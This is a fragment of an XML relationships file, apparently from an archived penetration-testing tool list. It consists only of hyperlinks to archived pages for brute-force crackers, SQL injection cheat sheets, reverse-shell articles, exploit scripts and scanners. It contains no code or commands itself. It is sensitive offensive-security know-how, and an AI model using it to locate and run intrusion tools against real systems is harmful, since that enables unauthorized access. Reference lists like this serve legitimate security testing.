Target="https://web.archive.org/web/20200309204648/http:/www.bindview.com/Services/RAZOR/Utilities/Windows/enum_readme.cfm" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ensyncsolutions.com/downloads.html" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sensepost.com/" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.voipshield.com/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.edge-security.com/edge-soft.php" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/net-square.com/httprint/httprint_paper.html" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ernw.de/download/ikeprobe.zip" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.org/UNIX/scanners/joomsq.py.txt" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.isecpartners.com/files/XMLDSIG_Command_Injection.pdf" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.wtcs.org/snmp4tpc/getif.htm" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.red-database-security.com/" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/freeworld.thc.org/thc-orakel/" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ngssoftware.com/papers/advanced_sql_injection.pdf" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.foofus.net/jmk/medusa/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.txdns.net/" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/michaeldaw.org/input_validation_cheat_sheet/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.woany.co.uk/" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.systemtools.com/download/dumpacl.zip" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.securityfocus.com/tools/3021" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cqure.net/wp/" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.nstalker.com/eng/products/nstealth/" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vopsecurity.org/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.darkc0de.com/c0de/ruby/sshbrute.txt" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/ikecrack.sourceforge.net/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.edge-security.com/metagoofil.php" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.nl/filedesc/joomlascan.py.txt.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/michaeldaw.org/input_validation_cheat_sheet/" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.foundstone.com/" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.imperva.com/products/scuba.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.hoobie.net/brutus/" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.mindmasters.nl/kender/zyxel/configreader.zip" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.oxid.it/cain.html" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.codework.com/dbvis/product.html" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.nextgenss.com/papers/more_advanced_sql_injection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eb.archive.org/web/20200309204648/https:/addons.mozilla.org/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.arhont.com/digitalAssets/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.gnucitizen.org/blog/reverse-shell-with-bash/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/forum.darkc0de.com/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sensepost.com/research/suru/" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;subcontent=/resources/proddesc/superscan.htm" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ernw.de/download/pskattack.pdf" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/pentestmonkey.net/tools/rsh-grind/" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cqure.net/tools/citrix_pa.zip" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor/" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ngssoftware.com/" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.hammerofgod.com/download.html" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.portswigger.net/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.metasploit.com/" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cqure.net/wp/" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.thc.org/releases.php" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.phenoelit.de/vncrack/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web.archive.org/web/20200309204648/http:/www.vulnerabiliyassessment.co.uk/passwords.htm" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.bitvise.com/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/https:/addons.mozilla.org/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cirt.net/code/nikto.shtml" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.darkc0de.com/others/joomscan.py" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/michaeldaw.org/sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/sourceforge.net/projects/ldapminer/" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.indianz.ch/" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/ntsecurity.nu/toolbox/sqldict/" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.dokfleed.net/duh/modules.php?name=News&amp;file=article&amp;sid=35" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.org/0007-exploits/pasvagg.pl" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/w3af.sourceforge.net/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.isecpartners.com/files/CSRF_Paper.pdf" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.securityfriday.com/tools/GetAcct.html" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.solarwinds.net/Download-Tools.htm" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vulnerabilityassessment.co.uk/dns_http.htm" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.pentest.co.uk/" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ngssoftware.com/products/database-security/ngs-squirrel-sybase.php" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.hackingvoip.com/tools/sip_rogue.tar.gz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eb.archive.org/web/20200309204648/http:/www.hackingciscoexposed.com/?link=tools" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/forum.darkc0de.com/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.owasp.org/index.php/Category:OWASP_WebScarab_Project" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/freeworld.thc.org/" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.gnucitizen.org/blog/hacking-citrix-the-forceful-way/" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ngssoftware.com/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/freeworld.thc.org/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/labs.neohapsis.com/2008/04/17/connect-back-shell-literally/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sensepost.com/research/crowbar%20" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/w3af.sourceforge.net/" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.org/NT/hack/sid.zip" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.securityfocus.com/infocus/1821" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cqure.net/tools/citrix_pa.zip" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ngssoftware.com/squirrelora.htm" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.acunetix.com/" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/web.archive.org/web/20030405132642/bogonel.mirror.spacebitch.com/" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.phenoelit.de/vncrack/" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.hackingexposedcisco.com/tools/TFTP-bruteforce.tar.gz" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.bitvise.com/winsshd" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.owasp.org/index.php/Category:OWASP_DirBuster_Project" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/destr0y.net/showthread.php?t=137" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.securiteam.com/tools/6F00D0U3GK.html" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cqure.net/wp/?page_id=6" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.org/groups/teso/guess-who-0.44.tgz" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/https:/addons.mozilla.org/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.irmplc.com/Tools/dominoaudit.pl" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.isecpartners.com/files/iSEC_HILL_AttackingXMLSecurity_Handout.pdf" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.isecpartners.com/hackingexposedweb20.html" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.cotse.com/tools/netbios.htm" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/adm.freelsd.net/ADM/" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/luma.sourceforge.net/" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vulnerabilityassessment.co.uk/WinSID.zip" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/infys.net/papers/Sql_Injection.pdf" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vulnerabilityassessment.co.uk/nfs.htm" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/netcat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200309204648/http:/www.monkey.org/~provos/scanssh/" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.codework.com/dbvis/product.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.security-database.com/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.acunetix.com/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.org/papers/attack/Whitepaper-Hacking-jBoss-using-a-Browser.pdf" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/ntsecurity.nu/toolbox/winfo/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/code.google.com/p/gobag/source/browse/trunk/citrix/bforce.js?r=2" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ngssoftware.com/" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.securiteam.com/tools/6Y00L0U5PC.html" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ippages.com/?ip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web.archive.org/web/20200309204648/http:/www.chiark.greenend.org.uk/~sgtatham/putty/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sensepost.com/research/wikto/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.indianz.ch/toolslnxe.html" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.webhackingexposed.com/" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.microsoft.com/" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.specialopssecurity.com/labs/sqlrecon/1.0/down.php" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vulnerabilityassessment.co.uk/default_oracle_passwords.htm" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/freeworld.thc.org/" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.securiteam.com/securityreviews/5DP0N1P76E.html" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/code.google.com/p/sipflanker/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/https:/addons.mozilla.org/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/grendel-scan.com/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/access1.sun.com/techarticles/simple.WAR.html" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.packetstormsecurity.org/UNIX/scanners/modscan.py.txt" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.gnucitizen.org/static/blog/2007/10/connect.js" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/portswigger.net/wahh/" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.red-database-security.com/software/plsqlscanner.html" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/dev.mysql.com/downloads/gui-tools/5.0.html" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.as3344.net/is-tor/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/winscp.net/eng/index.php" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.goolag.org/download.html" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/darkc0de.com/scanners/" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.vulnerabilityassessment.co.uk/%20http:/www.openldap.org/" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/packetstormsecurity.org/papers/attack/Hacking_ZyXEL_Gateways.pdf" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.hoobie.net/brutus/" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.ngssoftware.com/" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200309204648/http:/www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html" TargetMode="External"/><Relationship Id="rId187" 